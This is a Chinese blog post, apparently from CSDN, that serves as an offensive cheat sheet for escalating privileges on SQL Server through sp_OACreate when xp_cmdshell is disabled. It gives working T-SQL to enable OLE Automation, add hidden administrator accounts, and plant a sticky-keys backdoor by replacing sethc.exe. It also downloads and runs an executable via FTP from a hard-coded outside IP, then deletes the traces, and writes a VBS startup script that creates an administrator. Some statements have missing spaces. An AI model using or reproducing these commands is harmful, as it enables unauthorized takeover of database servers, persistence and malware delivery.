SP_OACreate提权经验

在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权

首先

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;

打开组件,2005中默认关闭

1)直接加用户

2000系统:
declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add'

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators123/add'

xp和2003系统:

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123$ 123/add'

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators123$ /add'

2)粘贴键替换

declare@o int
execsp_oacreate 'scripting.filesystemobject', @o out
execsp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
 

declare@o int
execsp_oacreate 'scripting.filesystemobject', @o out
execsp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';

需要同时具备sp_oacreate 和sp_oamethod 两个功能组件

3)直接传马

DECLARE@shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD@shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113> cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echobinary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye>> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q/f&del 1.exe /f /q'--

4)启动项写入加账户脚本

declare@sp_passwordxieo int, @f int, @t int, @ret int

execsp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out

execsp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1

exec@ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'

exec@ret = sp_oamethod @f, 'writeline',NULL,'os="WinNT://"&wsnetwork.ComputerName'

exec@ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'

exec@ret = sp_oamethod @f, 'writeline', NULL,'Setoe=GetObject(os&"/Administrators,group")'

exec@ret = sp_oamethod @f, 'writeline', NULL,'Setod=ob.Create("user","123$")'

exec@ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'

exec@ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'

exec@ret = sp_oamethod @f, 'writeline', NULL,'Setof=GetObject(os&"/123$",user)'

exec@ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';

5)如果该服务器有网站,则直接用方法4)写入一句话

DECLARE @Object int; DECLARE @HR int; DECLARE @Property nvarchar(255); DECLARE @Return nvarchar(255); DECLARE @Source nvarchar(255), @Desc nvarchar(255); DECLARE @httpStatus int; DECLARE @response varchar(8000); --创建 OLE 对象的实例 EXEC @HR = sp_OACreate N'MSXML2.XMLHTTP.6.0',@Object OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('Error Creating COM Component 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO END_ROUTINE END BEGIN --Open EXEC @HR = sp_OAMethod @Object,N'open',Null,'GET','http://localhost:1728/HttpServer/submit.aspx',FALSE; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('Open 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --setRequestHeader EXEC @HR = sp_OAMethod @Object,N'setRequestHeader',Null,'Content-Type','text/xml'; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('setRequestHeader 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --send EXEC @HR = sp_OAMethod @Object,N'send',Null,''; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('send 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --readyState EXEC @HR = sp_OAGetProperty @Object,'readyState', @httpStatus OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('readyState 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --verify status IF @httpStatus 4 BEGIN RAISERROR('readyState http status bad', 16,1) GOTO CLEANUP END --status EXEC @HR = sp_OAGetProperty @Object,'status', @httpStatus OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('getstatus 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --verify status IF @httpStatus 200 BEGIN Print Cast(@httpStatus As varchar) RAISERROR('Open http status bad', 16,1) GOTO CLEANUP END --responseText EXEC @HR = sp_OAGetProperty @Object, 'responseText', @response OUT IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('responseText 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END Print @response END CLEANUP: BEGIN EXEC @HR = sp_OADestroy @Object; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; SELECT HR = convert(varbinary(4),@HR),Source=@Source,Description=@Desc; END END END_ROUTINE: RETURN; GO
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值